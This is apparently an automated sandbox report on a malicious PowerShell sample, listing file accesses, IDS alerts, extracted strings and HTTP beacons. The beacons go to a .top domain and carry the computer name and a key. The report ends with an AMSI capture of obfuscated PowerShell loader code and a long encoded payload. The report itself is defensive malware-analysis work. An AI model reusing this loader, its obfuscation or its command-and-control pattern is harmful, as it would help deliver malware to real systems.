Click to jump to signature section
Source: | Binary string: System.Management.Automation.pdb` source: powershell.exe, 00000000.00000002.167748955367.000001F279B04000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: Automation.pdbS source: powershell.exe, 00000000.00000002.167755442036.000001F27C3A2000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.167752118018.000001F27BBD3000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.167752118018.000001F27BBD3000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: ion.pdb6 source: powershell.exe, 00000000.00000002.167753320498.000001F27BF45000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000000.00000002.167748955367.000001F279B04000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: ll\mscorlib.pdbroso' source: powershell.exe, 00000000.00000002.167755442036.000001F27C3A2000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.167755442036.000001F27C3A2000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdber-000 source: powershell.exe, 00000000.00000002.167755442036.000001F27C3A2000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb| source: powershell.exe, 00000000.00000002.167755442036.000001F27C394000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: .pdbD source: powershell.exe, 00000000.00000002.167755442036.000001F27C3A2000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb`G source: powershell.exe, 00000000.00000002.167754768870.000001F27C043000.00000004.00000020.00020000.00000000.sdmp |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | HTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Connection: Keep-Alive |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | HTTP traffic: GET /sorry/index?continue=http://www.google.com/&q=EgRmgZnuGLrz6LsGIjADQkcbsQsBOAo1QrWgduUG27aTsrDoCOjnlJzbhEhMqt9EFz7kh_v4bW9Fs_ByASEyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Cookie: NID=520=T-jAloyo2ALb8nUfi0PSjWobif1_y-VxpzqGnjiTAYlzf619HYsPI0bDkmifNB0arryXzOl-kaK4Wk4JDl-hddmsx0bXVY7yfOuN4g-x5JeCEmcYiIQNf7j-xB6hYXYj0L-eTMc0p9pcWweMfkIX572ODbuSMtZr4pGxZ0bUpQ2TQe2G5RJMx6ALM5vPfiUcqsDOXg |
Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.11.20:49761 -> 142.250.217.196:80 |
Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.11.20:49760 -> 45.61.136.138:80 |
Source: global traffic | HTTP traffic detected: GET /m15teydqhphtr.php?id=computer&key=27186586974&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kcehmenjdibnmni.topConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=http://www.google.com/&q=EgRmgZnuGLrz6LsGIjADQkcbsQsBOAo1QrWgduUG27aTsrDoCOjnlJzbhEhMqt9EFz7kh_v4bW9Fs_ByASEyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comCookie: NID=520=T-jAloyo2ALb8nUfi0PSjWobif1_y-VxpzqGnjiTAYlzf619HYsPI0bDkmifNB0arryXzOl-kaK4Wk4JDl-hddmsx0bXVY7yfOuN4g-x5JeCEmcYiIQNf7j-xB6hYXYj0L-eTMc0p9pcWweMfkIX572ODbuSMtZr4pGxZ0bUpQ2TQe2G5RJMx6ALM5vPfiUcqsDOXg |
Source: global traffic | HTTP traffic detected: GET /m15teydqhphtr.php?id=computer&key=27186586974&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kcehmenjdibnmni.topConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=http://www.google.com/&q=EgRmgZnuGLrz6LsGIjADQkcbsQsBOAo1QrWgduUG27aTsrDoCOjnlJzbhEhMqt9EFz7kh_v4bW9Fs_ByASEyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comCookie: NID=520=T-jAloyo2ALb8nUfi0PSjWobif1_y-VxpzqGnjiTAYlzf619HYsPI0bDkmifNB0arryXzOl-kaK4Wk4JDl-hddmsx0bXVY7yfOuN4g-x5JeCEmcYiIQNf7j-xB6hYXYj0L-eTMc0p9pcWweMfkIX572ODbuSMtZr4pGxZ0bUpQ2TQe2G5RJMx6ALM5vPfiUcqsDOXg |
Source: powershell.exe, 00000000.00000002.167728669153.000001F2010D7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$byv6103m9dkfxgj/$x1pqhoetanrl2cv.php? |
Source: powershell.exe, 00000000.00000002.167728669153.000001F2010D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.167728669153.000001F200F6A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$byv6103m9dkfxgj/$x1pqhoetanrl2cv.php?id=$env:computername&key=$kiewrcbop&s=527 |
Source: powershell.exe, 00000000.00000002.167752118018.000001F27BBD3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06 |
Source: powershell.exe, 00000000.00000002.167752118018.000001F27BBD3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: powershell.exe, 00000000.00000002.167752784412.000001F27BD80000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micr |
Source: powershell.exe, 00000000.00000002.167728669153.000001F200EBC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.167728669153.000001F200F3B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://kcehmenjdibnmni.top |
Source: powershell.exe, 00000000.00000002.167728669153.000001F200EBC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.167753320498.000001F27BF2C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://kcehmenjdibnmni.top/m15teydqhphtr.php?id=computer&key=27186586974&s=527 |
Source: powershell.exe, 00000000.00000002.167728669153.000001F200EBC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://kcehmenjdibnmni.top/m15teydqhphtr.php?id=computer&key=27186586974&s=527p |
Source: powershell.exe, 00000000.00000002.167744309242.000001F210074000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000000.00000002.167728669153.000001F2001DC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000000.00000002.167728669153.000001F2001DC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.pngXz |
Source: powershell.exe, 00000000.00000002.167728669153.000001F2001DC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/ |
Source: powershell.exe, 00000000.00000002.167728669153.000001F200001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000000.00000002.167728669153.000001F2001DC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/ |
Source: powershell.exe, 00000000.00000002.167728669153.000001F2001DC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000000.00000002.167728669153.000001F2001DC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz |
Source: powershell.exe, 00000000.00000002.167728669153.000001F200F3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.167728669153.000001F200F58000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com |
Source: powershell.exe, 00000000.00000002.167728669153.000001F200F6A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/ |
Source: powershell.exe, 00000000.00000002.167728669153.000001F200F58000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/&q=EgRmgZnuGLrz6LsGIjADQkcbsQsBOAo1QrWgduUG27aTsrDoCOjnlJzbhEhMqt9EFz7kh_v4bW9 |
Source: powershell.exe, 00000000.00000002.167728669153.000001F200F3B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgRmgZnuGLrz6LsGIjADQkcbsQsBOAo1 |
Source: powershell.exe, 00000000.00000002.167752118018.000001F27BBD3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.quovadis.bm0 |
Source: powershell.exe, 00000000.00000002.167728669153.000001F200001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000000.00000002.167744309242.000001F210074000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000000.00000002.167744309242.000001F210074000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000000.00000002.167744309242.000001F210074000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000000.00000002.167728669153.000001F200F3B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp |
Source: powershell.exe, 00000000.00000002.167728669153.000001F2001DC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000000.00000002.167728669153.000001F2001DC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/PesterXz |
Source: powershell.exe, 00000000.00000002.167744309242.000001F210074000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000000.00000002.167752118018.000001F27BBD3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ocsp.quovadisoffshore.com0 |
Source: powershell.exe, 00000000.00000002.167728669153.000001F200F3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.167728669153.000001F200F58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.167728669153.000001F200F6A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/recaptcha/api.js |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2528:304:WilStaging_02 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2528:120:WilError_03 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $ck2adi1pghjb3f6.(([system.String]::new(@((5343-5276),(9141-9030),(2873-2761),(-2085+2206),(3856-3772),(7026-6915)))))( $udb20fetjp1zwy8 ) $ck2adi1pghjb3f6.(([char[]]@((661826/(176+9702)),(3557-(3097202/(8399-(11828-4327)))),(-8743+(17018-8164)),(570055/(7048854/(7576-(7077-(6141-5218))))),(467024/(-4253+8877))) -join ''))()$iyuv4ca1ntgfldh.(([system.String]::new(@((584642/8726),(447012/4139),(6162-6051),(-542+657),(4531-(7143-(-1321+4034)))))))()[byte[]] $vmw0ps1o7e48l3y = $udb20fetjp1zwy8.(([system.String]::new(@((-10151+10235),(9389-9278),(426595/6563),(-2245+2359),(662340/5810),(-1418+(-6002+7517)),(3397-(12370176/3776))))))() $jaio2xqm68bpcs0=$vmw0ps1o7e48l3y return $jaio2xqm68bpcs0}[System.Text.Encoding]::ascii.(([char[]]@((542440/(64917080/(-820+9317))),(1025453/(15042-4889)),(4199-(13511-(11002476/(362+(4149775/(11229-6074)))))),(-3313+3396),(8152-8036),(7179-(5344+(4517625/(-2541+(8022798/(6692-(41014359/(37829940/4740)))))))),(-347+(-8022+(60436568/(2339296/(9216-(15753-6865)))))),(798050/7255),(-7332+(54758775/7365))) -join ''))((c3x1w6bn4ogvlz58qr0spy7tide "bPI+OTJ0eHVnaJz7KvYqbkDx5zgjl5BHxx6cpXiSpWJy7DzrTgfENVJJgDRz5FfUO0+BH6m5Pa4cn0aFFYx0qBBNblzqtd3LvwLVf65MX1cxN+yduQcpBE4ODpqbgYYoLZUpBooDgqaaofIgBPbA1sRT11otp6/470SJ4Y3PwAaXgtS0juIxBg/Kw4islfSbLFbIS8SYvZ7olcgQZL4hlm2ZFhpcHJK8qIDH4NuHtYO83uozCeWBGPYoGz2o3hSALne9lhOZDs4M3kIszTTt11nvzwbuzX+bLlXl74Ui3qcotdyLOeZl3qAiKunfGwTq/ELZgISylBJNoai8Vy41jj5Kv530jGs7HEgxF642EPsMGlsbxp0io0zgGrgwIu2RaNT1nlvvBJ1N7Y0LzvK7wv1Nj1yksvaKcc7Ycjrq1xYpCb+bob5Nlk7InZFEvtGLoqQgI2Cc9R70BbnKmIKqjZiB9gYK/Y7Ka9jAZdQZVlCtwQmcipeh9G27toqAkNW2j45NtsVTb+78X+74T0MIxtOcB0LchgnpnCbLwdgWh5mVHyaA1LYpx8KZz7qUB0RrwJ4v6gTyUF7a9kzQHqwqnuofIFiPVH6kxTCNsRPQQQ98kIthqsxypHmF4E+kOOeUANh69PXWF8UU91OVro/kotEcciID0qmUx7SbPaRmbvuhDQayJbLXQW+5ZCioxjUZLQLU4uA+qfcImULOXtXhn/oCqrcioMVZlkNZwFSeTXtIjtFBX57aFbnfIjOEIE0rrhcuSIWkAq7uN2Z5yKDgLWkBYLLUclfxbA15B9znI//Q5UOsRZ7oXCk4IW60pwADr1dzLkmYGRxKH2oKtrMIFOo107C+Kx4LQ/xiCrzkMgfefc1P1KwkHP1JsV5gnlDeRu36aiT4H25vzSciYNiihPfht1uT457dsLe32asmtN7eMsfpM0rRNevzsB84i/OJ+fxnFTtDJsNST12izcRYrECfwp7RpSSAlgqxIpTyM+NG/SBJd9B4o+dNTs6TCY58nanGluaBpLd1UgaCen2Ph9Dow95NRQTch2DYhMmert7UzyZA/M9xLtXbj87814uSPEZpe+YSpsq/sD4ZroVKzdYAh4OfjO+++JDYX4n5yYLxGpjtCsd+O5JgDv5Ba/3/IApYDl/FTOtiHBn/FlB68PNzJFAZxWF3IASrAE3Tl5oPhqyI/Obq4M6O+cBfUE+dmXq9+G+1u/Hq6a7hUJ1mHnylk4MjJBxjar73AwpnL/RDEYuFF6tMyCR18YuokXWa3umYQrdhiK+7uitOzM4KQmaQoEcSqI9tWInrBRv2eD4L |